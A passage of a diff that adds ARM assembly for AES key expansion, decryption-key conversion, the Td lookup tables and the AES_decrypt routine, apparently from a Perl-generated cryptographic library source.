+#endif
+
+	teq	lr,#128
+	bne	.Lnot128
+	mov	$rounds,#10
+	str	$rounds,[$key,#240-16]
+	add	$t3,$tbl,#256			@ rcon
+	mov	lr,#255
+
+.L128_loop:
+	and	$t2,lr,$s3,lsr#24
+	and	$i1,lr,$s3,lsr#16
+	ldrb	$t2,[$tbl,$t2]
+	and	$i2,lr,$s3,lsr#8
+	ldrb	$i1,[$tbl,$i1]
+	and	$i3,lr,$s3
+	ldrb	$i2,[$tbl,$i2]
+	orr	$t2,$t2,$i1,lsl#24
+	ldrb	$i3,[$tbl,$i3]
+	orr	$t2,$t2,$i2,lsl#16
+	ldr	$t1,[$t3],#4			@ rcon[i++]
+	orr	$t2,$t2,$i3,lsl#8
+	eor	$t2,$t2,$t1
+	eor	$s0,$s0,$t2			@ rk[4]=rk[0]^...
+	eor	$s1,$s1,$s0			@ rk[5]=rk[1]^rk[4]
+	str	$s0,[$key],#16
+	eor	$s2,$s2,$s1			@ rk[6]=rk[2]^rk[5]
+	str	$s1,[$key,#-12]
+	eor	$s3,$s3,$s2			@ rk[7]=rk[3]^rk[6]
+	str	$s2,[$key,#-8]
+	subs	$rounds,$rounds,#1
+	str	$s3,[$key,#-4]
+	bne	.L128_loop
+	sub	r2,$key,#176
+	b	.Ldone
+
+.Lnot128:
+#if __ARM_ARCH__<7
+	ldrb	$i2,[$rounds,#19]
+	ldrb	$t1,[$rounds,#18]
+	ldrb	$t2,[$rounds,#17]
+	ldrb	$t3,[$rounds,#16]
+	orr	$i2,$i2,$t1,lsl#8
+	ldrb	$i3,[$rounds,#23]
+	orr	$i2,$i2,$t2,lsl#16
+	ldrb	$t1,[$rounds,#22]
+	orr	$i2,$i2,$t3,lsl#24
+	ldrb	$t2,[$rounds,#21]
+	ldrb	$t3,[$rounds,#20]
+	orr	$i3,$i3,$t1,lsl#8
+	orr	$i3,$i3,$t2,lsl#16
+	str	$i2,[$key],#8
+	orr	$i3,$i3,$t3,lsl#24
+	str	$i3,[$key,#-4]
+#else
+	ldr	$i2,[$rounds,#16]
+	ldr	$i3,[$rounds,#20]
+#ifdef __ARMEL__
+	rev	$i2,$i2
+	rev	$i3,$i3
+#endif
+	str	$i2,[$key],#8
+	str	$i3,[$key,#-4]
+#endif
+
+	teq	lr,#192
+	bne	.Lnot192
+	mov	$rounds,#12
+	str	$rounds,[$key,#240-24]
+	add	$t3,$tbl,#256			@ rcon
+	mov	lr,#255
+	mov	$rounds,#8
+
+.L192_loop:
+	and	$t2,lr,$i3,lsr#24
+	and	$i1,lr,$i3,lsr#16
+	ldrb	$t2,[$tbl,$t2]
+	and	$i2,lr,$i3,lsr#8
+	ldrb	$i1,[$tbl,$i1]
+	and	$i3,lr,$i3
+	ldrb	$i2,[$tbl,$i2]
+	orr	$t2,$t2,$i1,lsl#24
+	ldrb	$i3,[$tbl,$i3]
+	orr	$t2,$t2,$i2,lsl#16
+	ldr	$t1,[$t3],#4			@ rcon[i++]
+	orr	$t2,$t2,$i3,lsl#8
+	eor	$i3,$t2,$t1
+	eor	$s0,$s0,$i3			@ rk[6]=rk[0]^...
+	eor	$s1,$s1,$s0			@ rk[7]=rk[1]^rk[6]
+	str	$s0,[$key],#24
+	eor	$s2,$s2,$s1			@ rk[8]=rk[2]^rk[7]
+	str	$s1,[$key,#-20]
+	eor	$s3,$s3,$s2			@ rk[9]=rk[3]^rk[8]
+	str	$s2,[$key,#-16]
+	subs	$rounds,$rounds,#1
+	str	$s3,[$key,#-12]
+#if __ARM_ARCH__>=7
+	itt	eq				@ Thumb2 thing, sanity check in ARM
+#endif
+	subeq	r2,$key,#216
+	beq	.Ldone
+
+	ldr	$i1,[$key,#-32]
+	ldr	$i2,[$key,#-28]
+	eor	$i1,$i1,$s3			@ rk[10]=rk[4]^rk[9]
+	eor	$i3,$i2,$i1			@ rk[11]=rk[5]^rk[10]
+	str	$i1,[$key,#-8]
+	str	$i3,[$key,#-4]
+	b	.L192_loop
+
+.Lnot192:
+#if __ARM_ARCH__<7
+	ldrb	$i2,[$rounds,#27]
+	ldrb	$t1,[$rounds,#26]
+	ldrb	$t2,[$rounds,#25]
+	ldrb	$t3,[$rounds,#24]
+	orr	$i2,$i2,$t1,lsl#8
+	ldrb	$i3,[$rounds,#31]
+	orr	$i2,$i2,$t2,lsl#16
+	ldrb	$t1,[$rounds,#30]
+	orr	$i2,$i2,$t3,lsl#24
+	ldrb	$t2,[$rounds,#29]
+	ldrb	$t3,[$rounds,#28]
+	orr	$i3,$i3,$t1,lsl#8
+	orr	$i3,$i3,$t2,lsl#16
+	str	$i2,[$key],#8
+	orr	$i3,$i3,$t3,lsl#24
+	str	$i3,[$key,#-4]
+#else
+	ldr	$i2,[$rounds,#24]
+	ldr	$i3,[$rounds,#28]
+#ifdef __ARMEL__
+	rev	$i2,$i2
+	rev	$i3,$i3
+#endif
+	str	$i2,[$key],#8
+	str	$i3,[$key,#-4]
+#endif
+
+	mov	$rounds,#14
+	str	$rounds,[$key,#240-32]
+	add	$t3,$tbl,#256			@ rcon
+	mov	lr,#255
+	mov	$rounds,#7
+
+.L256_loop:
+	and	$t2,lr,$i3,lsr#24
+	and	$i1,lr,$i3,lsr#16
+	ldrb	$t2,[$tbl,$t2]
+	and	$i2,lr,$i3,lsr#8
+	ldrb	$i1,[$tbl,$i1]
+	and	$i3,lr,$i3
+	ldrb	$i2,[$tbl,$i2]
+	orr	$t2,$t2,$i1,lsl#24
+	ldrb	$i3,[$tbl,$i3]
+	orr	$t2,$t2,$i2,lsl#16
+	ldr	$t1,[$t3],#4			@ rcon[i++]
+	orr	$t2,$t2,$i3,lsl#8
+	eor	$i3,$t2,$t1
+	eor	$s0,$s0,$i3			@ rk[8]=rk[0]^...
+	eor	$s1,$s1,$s0			@ rk[9]=rk[1]^rk[8]
+	str	$s0,[$key],#32
+	eor	$s2,$s2,$s1			@ rk[10]=rk[2]^rk[9]
+	str	$s1,[$key,#-28]
+	eor	$s3,$s3,$s2			@ rk[11]=rk[3]^rk[10]
+	str	$s2,[$key,#-24]
+	subs	$rounds,$rounds,#1
+	str	$s3,[$key,#-20]
+#if __ARM_ARCH__>=7
+	itt	eq				@ Thumb2 thing, sanity check in ARM
+#endif
+	subeq	r2,$key,#256
+	beq	.Ldone
+
+	and	$t2,lr,$s3
+	and	$i1,lr,$s3,lsr#8
+	ldrb	$t2,[$tbl,$t2]
+	and	$i2,lr,$s3,lsr#16
+	ldrb	$i1,[$tbl,$i1]
+	and	$i3,lr,$s3,lsr#24
+	ldrb	$i2,[$tbl,$i2]
+	orr	$t2,$t2,$i1,lsl#8
+	ldrb	$i3,[$tbl,$i3]
+	orr	$t2,$t2,$i2,lsl#16
+	ldr	$t1,[$key,#-48]
+	orr	$t2,$t2,$i3,lsl#24
+
+	ldr	$i1,[$key,#-44]
+	ldr	$i2,[$key,#-40]
+	eor	$t1,$t1,$t2			@ rk[12]=rk[4]^...
+	ldr	$i3,[$key,#-36]
+	eor	$i1,$i1,$t1			@ rk[13]=rk[5]^rk[12]
+	str	$t1,[$key,#-16]
+	eor	$i2,$i2,$i1			@ rk[14]=rk[6]^rk[13]
+	str	$i1,[$key,#-12]
+	eor	$i3,$i3,$i2			@ rk[15]=rk[7]^rk[14]
+	str	$i2,[$key,#-8]
+	str	$i3,[$key,#-4]
+	b	.L256_loop
+
+.align	2
+.Ldone:	mov	r0,#0
+	ldmia   sp!,{r4-r12,lr}
+.Labrt:
+#if __ARM_ARCH__>=5
+	ret				@ bx lr
+#else
+	tst	lr,#1
+	moveq	pc,lr			@ be binary compatible with V4, yet
+	bx	lr			@ interoperable with Thumb ISA:-)
+#endif
+.size	private_AES_set_encrypt_key,.-private_AES_set_encrypt_key
+
+.global private_AES_set_decrypt_key
+.type   private_AES_set_decrypt_key,%function
+.align	5
+private_AES_set_decrypt_key:
+	str	lr,[sp,#-4]!            @ push lr
+	bl	_armv4_AES_set_encrypt_key
+	teq	r0,#0
+	ldr	lr,[sp],#4              @ pop lr
+	bne	.Labrt
+
+	mov	r0,r2			@ AES_set_encrypt_key preserves r2,
+	mov	r1,r2			@ which is AES_KEY *key
+	b	_armv4_AES_set_enc2dec_key
+.size	private_AES_set_decrypt_key,.-private_AES_set_decrypt_key
+
+@ void AES_set_enc2dec_key(const AES_KEY *inp,AES_KEY *out)
+.global	AES_set_enc2dec_key
+.type	AES_set_enc2dec_key,%function
+.align	5
+AES_set_enc2dec_key:
+_armv4_AES_set_enc2dec_key:
+	stmdb   sp!,{r4-r12,lr}
+
+	ldr	$rounds,[r0,#240]
+	mov	$i1,r0			@ input
+	add	$i2,r0,$rounds,lsl#4
+	mov	$key,r1			@ ouput
+	add	$tbl,r1,$rounds,lsl#4
+	str	$rounds,[r1,#240]
+
+.Linv:	ldr	$s0,[$i1],#16
+	ldr	$s1,[$i1,#-12]
+	ldr	$s2,[$i1,#-8]
+	ldr	$s3,[$i1,#-4]
+	ldr	$t1,[$i2],#-16
+	ldr	$t2,[$i2,#16+4]
+	ldr	$t3,[$i2,#16+8]
+	ldr	$i3,[$i2,#16+12]
+	str	$s0,[$tbl],#-16
+	str	$s1,[$tbl,#16+4]
+	str	$s2,[$tbl,#16+8]
+	str	$s3,[$tbl,#16+12]
+	str	$t1,[$key],#16
+	str	$t2,[$key,#-12]
+	str	$t3,[$key,#-8]
+	str	$i3,[$key,#-4]
+	teq	$i1,$i2
+	bne	.Linv
+
+	ldr	$s0,[$i1]
+	ldr	$s1,[$i1,#4]
+	ldr	$s2,[$i1,#8]
+	ldr	$s3,[$i1,#12]
+	str	$s0,[$key]
+	str	$s1,[$key,#4]
+	str	$s2,[$key,#8]
+	str	$s3,[$key,#12]
+	sub	$key,$key,$rounds,lsl#3
+___
+$mask80=$i1;
+$mask1b=$i2;
+$mask7f=$i3;
+$code.=<<___;
+	ldr	$s0,[$key,#16]!		@ prefetch tp1
+	mov	$mask80,#0x80
+	mov	$mask1b,#0x1b
+	orr	$mask80,$mask80,#0x8000
+	orr	$mask1b,$mask1b,#0x1b00
+	orr	$mask80,$mask80,$mask80,lsl#16
+	orr	$mask1b,$mask1b,$mask1b,lsl#16
+	sub	$rounds,$rounds,#1
+	mvn	$mask7f,$mask80
+	mov	$rounds,$rounds,lsl#2	@ (rounds-1)*4
+
+.Lmix:	and	$t1,$s0,$mask80
+	and	$s1,$s0,$mask7f
+	sub	$t1,$t1,$t1,lsr#7
+	and	$t1,$t1,$mask1b
+	eor	$s1,$t1,$s1,lsl#1	@ tp2
+
+	and	$t1,$s1,$mask80
+	and	$s2,$s1,$mask7f
+	sub	$t1,$t1,$t1,lsr#7
+	and	$t1,$t1,$mask1b
+	eor	$s2,$t1,$s2,lsl#1	@ tp4
+
+	and	$t1,$s2,$mask80
+	and	$s3,$s2,$mask7f
+	sub	$t1,$t1,$t1,lsr#7
+	and	$t1,$t1,$mask1b
+	eor	$s3,$t1,$s3,lsl#1	@ tp8
+
+	eor	$t1,$s1,$s2
+	eor	$t2,$s0,$s3		@ tp9
+	eor	$t1,$t1,$s3		@ tpe
+	eor	$t1,$t1,$s1,ror#24
+	eor	$t1,$t1,$t2,ror#24	@ ^= ROTATE(tpb=tp9^tp2,8)
+	eor	$t1,$t1,$s2,ror#16
+	eor	$t1,$t1,$t2,ror#16	@ ^= ROTATE(tpd=tp9^tp4,16)
+	eor	$t1,$t1,$t2,ror#8	@ ^= ROTATE(tp9,24)
+
+	ldr	$s0,[$key,#4]		@ prefetch tp1
+	str	$t1,[$key],#4
+	subs	$rounds,$rounds,#1
+	bne	.Lmix
+
+	mov	r0,#0
+#if __ARM_ARCH__>=5
+	ldmia	sp!,{r4-r12,pc}
+#else
+	ldmia   sp!,{r4-r12,lr}
+	tst	lr,#1
+	moveq	pc,lr			@ be binary compatible with V4, yet
+	bx	lr			@ interoperable with Thumb ISA:-)
+#endif
+.size	AES_set_enc2dec_key,.-AES_set_enc2dec_key
+
+.type	AES_Td,%object
+.align	5
+AES_Td:
+.word	0x51f4a750, 0x7e416553, 0x1a17a4c3, 0x3a275e96
+.word	0x3bab6bcb, 0x1f9d45f1, 0xacfa58ab, 0x4be30393
+.word	0x2030fa55, 0xad766df6, 0x88cc7691, 0xf5024c25
+.word	0x4fe5d7fc, 0xc52acbd7, 0x26354480, 0xb562a38f
+.word	0xdeb15a49, 0x25ba1b67, 0x45ea0e98, 0x5dfec0e1
+.word	0xc32f7502, 0x814cf012, 0x8d4697a3, 0x6bd3f9c6
+.word	0x038f5fe7, 0x15929c95, 0xbf6d7aeb, 0x955259da
+.word	0xd4be832d, 0x587421d3, 0x49e06929, 0x8ec9c844
+.word	0x75c2896a, 0xf48e7978, 0x99583e6b, 0x27b971dd
+.word	0xbee14fb6, 0xf088ad17, 0xc920ac66, 0x7dce3ab4
+.word	0x63df4a18, 0xe51a3182, 0x97513360, 0x62537f45
+.word	0xb16477e0, 0xbb6bae84, 0xfe81a01c, 0xf9082b94
+.word	0x70486858, 0x8f45fd19, 0x94de6c87, 0x527bf8b7
+.word	0xab73d323, 0x724b02e2, 0xe31f8f57, 0x6655ab2a
+.word	0xb2eb2807, 0x2fb5c203, 0x86c57b9a, 0xd33708a5
+.word	0x302887f2, 0x23bfa5b2, 0x02036aba, 0xed16825c
+.word	0x8acf1c2b, 0xa779b492, 0xf307f2f0, 0x4e69e2a1
+.word	0x65daf4cd, 0x0605bed5, 0xd134621f, 0xc4a6fe8a
+.word	0x342e539d, 0xa2f355a0, 0x058ae132, 0xa4f6eb75
+.word	0x0b83ec39, 0x4060efaa, 0x5e719f06, 0xbd6e1051
+.word	0x3e218af9, 0x96dd063d, 0xdd3e05ae, 0x4de6bd46
+.word	0x91548db5, 0x71c45d05, 0x0406d46f, 0x605015ff
+.word	0x1998fb24, 0xd6bde997, 0x894043cc, 0x67d99e77
+.word	0xb0e842bd, 0x07898b88, 0xe7195b38, 0x79c8eedb
+.word	0xa17c0a47, 0x7c420fe9, 0xf8841ec9, 0x00000000
+.word	0x09808683, 0x322bed48, 0x1e1170ac, 0x6c5a724e
+.word	0xfd0efffb, 0x0f853856, 0x3daed51e, 0x362d3927
+.word	0x0a0fd964, 0x685ca621, 0x9b5b54d1, 0x24362e3a
+.word	0x0c0a67b1, 0x9357e70f, 0xb4ee96d2, 0x1b9b919e
+.word	0x80c0c54f, 0x61dc20a2, 0x5a774b69, 0x1c121a16
+.word	0xe293ba0a, 0xc0a02ae5, 0x3c22e043, 0x121b171d
+.word	0x0e090d0b, 0xf28bc7ad, 0x2db6a8b9, 0x141ea9c8
+.word	0x57f11985, 0xaf75074c, 0xee99ddbb, 0xa37f60fd
+.word	0xf701269f, 0x5c72f5bc, 0x44663bc5, 0x5bfb7e34
+.word	0x8b432976, 0xcb23c6dc, 0xb6edfc68, 0xb8e4f163
+.word	0xd731dcca, 0x42638510, 0x13972240, 0x84c61120
+.word	0x854a247d, 0xd2bb3df8, 0xaef93211, 0xc729a16d
+.word	0x1d9e2f4b, 0xdcb230f3, 0x0d8652ec, 0x77c1e3d0
+.word	0x2bb3166c, 0xa970b999, 0x119448fa, 0x47e96422
+.word	0xa8fc8cc4, 0xa0f03f1a, 0x567d2cd8, 0x223390ef
+.word	0x87494ec7, 0xd938d1c1, 0x8ccaa2fe, 0x98d40b36
+.word	0xa6f581cf, 0xa57ade28, 0xdab78e26, 0x3fadbfa4
+.word	0x2c3a9de4, 0x5078920d, 0x6a5fcc9b, 0x547e4662
+.word	0xf68d13c2, 0x90d8b8e8, 0x2e39f75e, 0x82c3aff5
+.word	0x9f5d80be, 0x69d0937c, 0x6fd52da9, 0xcf2512b3
+.word	0xc8ac993b, 0x10187da7, 0xe89c636e, 0xdb3bbb7b
+.word	0xcd267809, 0x6e5918f4, 0xec9ab701, 0x834f9aa8
+.word	0xe6956e65, 0xaaffe67e, 0x21bccf08, 0xef15e8e6
+.word	0xbae79bd9, 0x4a6f36ce, 0xea9f09d4, 0x29b07cd6
+.word	0x31a4b2af, 0x2a3f2331, 0xc6a59430, 0x35a266c0
+.word	0x744ebc37, 0xfc82caa6, 0xe090d0b0, 0x33a7d815
+.word	0xf104984a, 0x41ecdaf7, 0x7fcd500e, 0x1791f62f
+.word	0x764dd68d, 0x43efb04d, 0xccaa4d54, 0xe49604df
+.word	0x9ed1b5e3, 0x4c6a881b, 0xc12c1fb8, 0x4665517f
+.word	0x9d5eea04, 0x018c355d, 0xfa877473, 0xfb0b412e
+.word	0xb3671d5a, 0x92dbd252, 0xe9105633, 0x6dd64713
+.word	0x9ad7618c, 0x37a10c7a, 0x59f8148e, 0xeb133c89
+.word	0xcea927ee, 0xb761c935, 0xe11ce5ed, 0x7a47b13c
+.word	0x9cd2df59, 0x55f2733f, 0x1814ce79, 0x73c737bf
+.word	0x53f7cdea, 0x5ffdaa5b, 0xdf3d6f14, 0x7844db86
+.word	0xcaaff381, 0xb968c43e, 0x3824342c, 0xc2a3405f
+.word	0x161dc372, 0xbce2250c, 0x283c498b, 0xff0d9541
+.word	0x39a80171, 0x080cb3de, 0xd8b4e49c, 0x6456c190
+.word	0x7bcb8461, 0xd532b670, 0x486c5c74, 0xd0b85742
+@ Td4[256]
+.byte	0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38
+.byte	0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb
+.byte	0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87
+.byte	0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb
+.byte	0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d
+.byte	0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e
+.byte	0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2
+.byte	0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25
+.byte	0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16
+.byte	0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92
+.byte	0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda
+.byte	0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84
+.byte	0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a
+.byte	0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06
+.byte	0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02
+.byte	0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b
+.byte	0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea
+.byte	0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73
+.byte	0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85
+.byte	0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e
+.byte	0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89
+.byte	0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b
+.byte	0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20
+.byte	0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4
+.byte	0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31
+.byte	0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f
+.byte	0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d
+.byte	0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef
+.byte	0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0
+.byte	0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61
+.byte	0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26
+.byte	0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d
+.size	AES_Td,.-AES_Td
+
+@ void AES_decrypt(const unsigned char *in, unsigned char *out,
+@ 		 const AES_KEY *key) {
+.global AES_decrypt
+.type   AES_decrypt,%function
+.align	5
+AES_decrypt:
+#if __ARM_ARCH__<7
+	sub	r3,pc,#8		@ AES_decrypt
+#else
+	adr	r3,AES_decrypt
+#endif
+	stmdb   sp!,{r1,r4-r12,lr}
+	mov	$rounds,r0		@ inp
+	mov	$key,r2
+	sub	$tbl,r3,#AES_decrypt-AES_Td		@ Td
+#if __ARM_ARCH__<7
+	ldrb	$s0,[$rounds,#3]	@ load input data in endian-neutral
+	ldrb	$t1,[$rounds,#2]	@ manner...
+	ldrb	$t2,[$rounds,#1]
+	ldrb	$t3,[$rounds,#0]
+	orr	$s0,$s0,$t1,lsl#8
+	ldrb	$s1,[$rounds,#7]
+	orr	$s0,$s0,$t2,lsl#16
+	ldrb	$t1,[$rounds,#6]
+	orr	$s0,$s0,$t3,lsl#24
+	ldrb	$t2,[$rounds,#5]
+	ldrb	$t3,[$rounds,#4]
+	orr	$s1,$s1,$t1,lsl#8
+	ldrb	$s2,[$rounds,#11]
+	orr	$s1,$s1,$t2,lsl#16
+	ldrb	$t1,[$rounds,#10]
+	orr	$s1,$s1,$t3,lsl#24
+	ldrb	$t2,[$rounds,#9]
+	ldrb	$t3,[$rounds,#8]
+	orr	$s2,$s2,$t1,lsl#8
+	ldrb	$s3,[$rounds,#15]
+	orr	$s2,$s2,$t2,lsl#16
+	ldrb	$t1,[$rounds,#14]
+	orr	$s2,$s2,$t3,lsl#24
+	ldrb	$t2,[$rounds,#13]
+	ldrb	$t3,[$rounds,#12]
+	orr	$s3,$s3,$t1,lsl#8
+	orr	$s3,$s3,$t2,lsl#16
+	orr	$s3,$s3,$t3,lsl#24
+#else
+	ldr	$s0,[$rounds,#0]
+	ldr	$s1,[$rounds,#4]
+	ldr	$s2,[$rounds,#8]
+	ldr	$s3,[$rounds,#12]
+#ifdef __ARMEL__
+	rev	$s0,$s0
+	rev	$s1,$s1
+	rev	$s2,$s2
+	rev	$s3,$s3
+#endif
+#endif
+	bl	_armv4_AES_decrypt
+
+	ldr	$rounds,[sp],#4		@ pop out
+#if __ARM_ARCH__>=7
+#ifdef __ARMEL__
+	rev	$s0,$s0
+	rev	$s1,$s1
+	rev	$s2,$s2
+	rev	$s3,$s3
+#endif
+	str	$s0,[$rounds,#0]
+	str	$s1,[$rounds,#4]
+	str	$s2,[$rounds,#8]
+	str	$s3,[$rounds,#12]
+#else
+	mov	$t1,$s0,lsr#24		@ write output in endian-neutral
+	mov	$t2,$s0,lsr#16		@ manner...
+	mov	$t3,$s0,lsr#8
+	strb	$t1,[$rounds,#0]
+	strb	$t2,[$rounds,#1]
+	mov	$t1,$s1,lsr#24
+	strb	$t3,[$rounds,#2]
+	mov	$t2,$s1,lsr#16
+	strb	$s0,[$rounds,#3]
+	mov	$t3,$s1,lsr#8
+	strb	$t1,[$rounds,#4]
+	strb	$t2,[$rounds,#5]
+	mov	$t1,$s2,lsr#24
+	strb	$t3,[$rounds,#6]
+	mov	$t2,$s2,lsr#16
+	strb	$s1,[$rounds,#7]
+	mov	$t3,$s2,lsr#8
+	strb	$t1,[$rounds,#8]
+	strb	$t2,[$rounds,#9]
+	mov	$t1,$s3,lsr#24
+	strb	$t3,[$rounds,#10]
+	mov	$t2,$s3,lsr#16
+	strb	$s2,[$rounds,#11]
+	mov	$t3,$s3,lsr#8
+	strb	$t1,[$rounds,#12]
+	strb	$t2,[$rounds,#13]
+	strb	$t3,[$rounds,#14]
+	strb	$s3,[$rounds,#15]
+#endif
+#if __ARM_ARCH__>=5
+	ldmia	sp!,{r4-r12,pc}
+#else
+	ldmia   sp!,{r4-r12,lr}
+	tst	lr,#1
+	moveq	pc,lr			@ be binary compatible with V4, yet
+	bx	lr			@ interoperable with Thumb ISA:-)
+#endif
+.size	AES_decrypt,.-AES_decrypt
+
+.type   _armv4_AES_decrypt,%function
+.align	2
+_armv4_AES_decrypt:
+	str	lr,[sp,#-4]!		@ push lr
+	ldmia	$key!,{$t1-$i1}
+	eor	$s0,$s0,$t1
+	ldr	$rounds,[$key,#240-16]
+	eor	$s1,$s1,$t2
+	eor	$s2,$s2,$t3
+	eor	$s3,$s3,$i1
+	sub	$rounds,$rounds,#1
+	mov	lr,#255
+
+	and	$i1,lr,$s0,lsr#16
+	and	$i2,lr,$s0,lsr#8
+	and	$i3,lr,$s0
+	mov	$s0,$s0,lsr#24
+.Ldec_loop:
+	ldr	$t1,[$tbl,$i1,lsl#2]	@ Td1[s0>>16]
+	and	$i1,lr,$s1		@ i0
+	ldr	$t2,[$tbl,$i2,lsl#2]	@ Td2[s0>>8]
+	and	$i2,lr,$s1,lsr#16
+	ldr	$t3,[$tbl,$i3,lsl#2]	@ Td3[s0>>0]
+	and	$i3,lr,$s1,lsr#8
+	ldr	$s0,[$tbl,$s0,lsl#2]	@ Td0[s0>>24]
+	mov	$s1,$s1,lsr#24
+
+	ldr	$i1,[$tbl,$i1,lsl#2]	@ Td3[s1>>0]
+	ldr	$i2,[$tbl,$i2,lsl#2]	@ Td1[s1>>16]
+	ldr	$i3,[$tbl,$i3,lsl#2]	@ Td2[s1>>8]
+	eor	$s0,$s0,$i1,ror#24
+	ldr	$s1,[$tbl,$s1,lsl#2]	@ Td0[s1>>24]
+	and	$i1,lr,$s2,lsr#8	@ i0
+	eor	$t2,$i2,$t2,ror#8
+	and	$i2,lr,$s2		@ i1
+	eor	$t3,$i3,$t3,ror#8
+	and	$i3,lr,$s2,lsr#16
+	ldr	$i1,[$tbl,$i1,lsl#2]	@ Td2[s2>>8]
+	eor	$s1,$s1,$t1,ror#8
+	ldr	$i2,[$tbl,$i2,lsl#2]	@ Td3[s2>>0]
+	mov	$s2,$s2,lsr#24
+
+	ldr	$i3,[$tbl,$i3,lsl#2]	@ Td1[s2>>16]
+	eor	$s0,$s0,$i1,ror#16
+	ldr	$s2,[$tbl,$s2,lsl#2]	@ Td0[s2>>24]
+	and	$i1,lr,$s3,lsr#16	@ i0
+	eor	$s1,$s1,$i2,ror#24
+	and	$i2,lr,$s3,lsr#8	@ i1
+	eor	$t3,$i3,$t3,ror#8
+	and	$i3,lr,$s3		@ i2
+	ldr	$i1,[$tbl,$i1,lsl#2]	@ Td1[s3>>16]
+	eor	$s2,$s2,$t2,ror#8
+	ldr	$i2,[$tbl,$i2,lsl#2]	@ Td2[s3>>8]
+	mov	$s3,$s3,lsr#24
+
+	ldr	$i3,[$tbl,$i3,lsl#2]	@ Td3[s3>>0]
+	eor	$s0,$s0,$i1,ror#8
+	ldr	$i1,[$key],#16
+	eor	$s1,$s1,$i2,ror#16
+	ldr	$s3,[$tbl,$s3,lsl#2]	@ Td0[s3>>24]
+	eor	$s2,$s2,$i3,ror#24
+
+	ldr	$t1,[$key,#-12]
+	eor	$s0,$s0,$i1
+	ldr	$t2,[$key,#-8]
+	eor	$s3,$s3,$t3,ror#8
+	ldr	$t3,[$key,#-4]
+	and	$i1,lr,$s0,lsr#16
+	eor	$s1,$s1,$t1
+	and	$i2,lr,$s0,lsr#8
+	eor	$s2,$s2,$t2
+	and	$i3,lr,$s0
+	eor	$s3,$s3,$t3
+	mov	$s0,$s0,lsr#24
+
+	subs	$rounds,$rounds,#1
+	bne	.Ldec_loop
+
+	add	$tbl,$tbl,#1024
+
+	ldr	$t2,[$tbl,#0]		@ prefetch Td4
+	ldr	$t3,[$tbl,#32]
+	ldr	$t1,[$tbl,#64]
+	ldr	$t2,[$tbl,#96]
+	ldr	$t3,[$tbl,#128]
+	ldr	$t1,[$tbl,#160]
+	ldr	$t2,[$tbl,#192]
+	ldr	$t3,[$tbl,#224]
+
+	ldrb	$s0,[$tbl,$s0]		@ Td4[s0>>24]
+	ldrb	$t1,[$tbl,$i1]		@ Td4[s0>>16]
+	and	$i1,lr,$s1		@ i0
+	ldrb	$t2,[$tbl,$i2]		@ Td4[s0>>8]
+	and	$i2,lr,$s1,lsr#16
+	ldrb	$t3,[$tbl,$i3]		@ Td4[s0>>0]
+	and	$i3,lr,$s1,lsr#8
+
+	add	$s1,$tbl,$s1,lsr#24
+	ldrb	$i1,[$tbl,$i1]		@ Td4[s1>>0]
+	ldrb	$s1,[$s1]		@ Td4[s1>>24]
+	ldrb	$i2,[$tbl,$i2]		@ Td4[s1>>16]
+	eor	$s0,$i1,$s0,lsl#24
+	ldrb	$i3,[$tbl,$i3]		@ Td4[s1>>8]
+	eor	$s1,$t1,$s1,lsl#8
+	and	$i1,lr,$s2,lsr#8	@ i0
+	eor	$t2,$t2,$i2,lsl#8
+	and	$i2,lr,$s2		@ i1
+	ldrb	$i1,[$tbl,$i1]		@ Td4[s2>>8]
+	eor	$t3,$t3,$i3,lsl#8
+	ldrb	$i2,[$tbl,$i2]		@ Td4[s2>>0]
+	and	$i3,lr,$s2,lsr#16
+
+	add	$s2,$tbl,$s2,lsr#24
+	ldrb	$s2,[$s2]		@ Td4[s2>>24]
+	eor	$s0,$s0,$i1,lsl#8
+	ldrb	$i3,[$tbl,$i3]		@ Td4[s2>>16]
+	eor	$s1,$i2,$s1,lsl#16
+	and	$i1,lr,$s3,lsr#16	@ i0
+	eor	$s2,$t2,$s2,lsl#16
+	and	$i2,lr,$s3,lsr#8	@ i1
+	ldrb	$i1,[$tbl,$i1]		@ Td4[s3>>16]
+	eor	$t3,$t3,$i3,lsl#16
+	ldrb	$i2,[$tbl,$i2]		@ Td4[s3>>8]
